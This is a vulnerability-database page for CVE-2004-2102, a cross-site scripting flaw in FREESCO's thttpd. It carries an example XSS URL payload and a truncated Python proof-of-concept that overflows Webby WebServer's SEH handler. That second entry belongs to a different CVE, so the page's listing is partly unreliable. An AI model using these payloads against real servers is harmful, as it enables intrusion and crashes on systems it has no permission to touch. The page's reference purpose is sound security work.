CVE-2004-2102
published 2004-12-31CVE-2004-2102: Cross-site scripting (XSS) vulnerability in FREESCO 2.05, a modified version of thttpd, allows remote attackers to inject arbitrary web script or HTML via the…
PriorityP416medium4.3CVSS 2.0
AVNACMAuNCNIPAN
EXPLOIT
EPSS
1.36%
68.2th percentile
Cross-site scripting (XSS) vulnerability in FREESCO 2.05, a modified version of thttpd, allows remote attackers to inject arbitrary web script or HTML via the test parameter.
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Webby WebServer - Overflow (SEH) (PoC)
exploitdb·2010-05-25
CVE-2010-2102 Webby WebServer - Overflow (SEH) (PoC)
Webby WebServer - Overflow (SEH) (PoC)
---
#!/usr/bin/python
##POC details:
##
##SEH overwritten
##
##contact: [email protected]
## http://www.s3cur1ty.de
##App detail:
##
#http://www.shareware.de/webby-webserver/
#Version 1.01
#Autor Timo Gaik
#Lizenzart Freeware
#Plattformen Win XP, Win 98, Win ME
#Letztes Update 19.10.2004
#Dateigroesse 701 KB
import socket
import sys
import os.path
import time
if len(sys.argv) "
sys.exit(0)
ips = sys.argv[1]
port = int(sys.argv[2])
string = "A"*790
string += "\x90"*4
string += "\x42"*105
method = "GET"
print "starting POC for:", ips
print ""
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
try:
connect=s.connect((ips, port))
except:
print "no connection possible"
sys.exit(1)
payload = method + ' http://'+ ips + '/' + string + ' HTTP/1.0\x0d\x0a
Exploit-DB
Acme thttpd 1.9/2.0.x - CGI Test Script Cross-Site Scripting
exploitdb·2004-01-22
CVE-2004-2102 Acme thttpd 1.9/2.0.x - CGI Test Script Cross-Site Scripting
Acme thttpd 1.9/2.0.x - CGI Test Script Cross-Site Scripting
---
source: https://www.securityfocus.com/bid/9474/info
thttpd is prone to a cross-site scripting vulnerability in the CGI test script. This could permit a remote attacker to create a malicious link to the web server that includes hostile HTML and script code. If this link were followed, the hostile code may be rendered in the web browser of the victim user. This would occur in the security context of the web server and may allow for theft of cookie-based authentication credentials or other attacks.
It should be noted that FREESCO includes an embedded version of thttpd and is also prone to this vulnerability.
http://www.example.com/cgi/example?test=alert('xss')
No writeups or analysis indexed.
2004-12-31
Published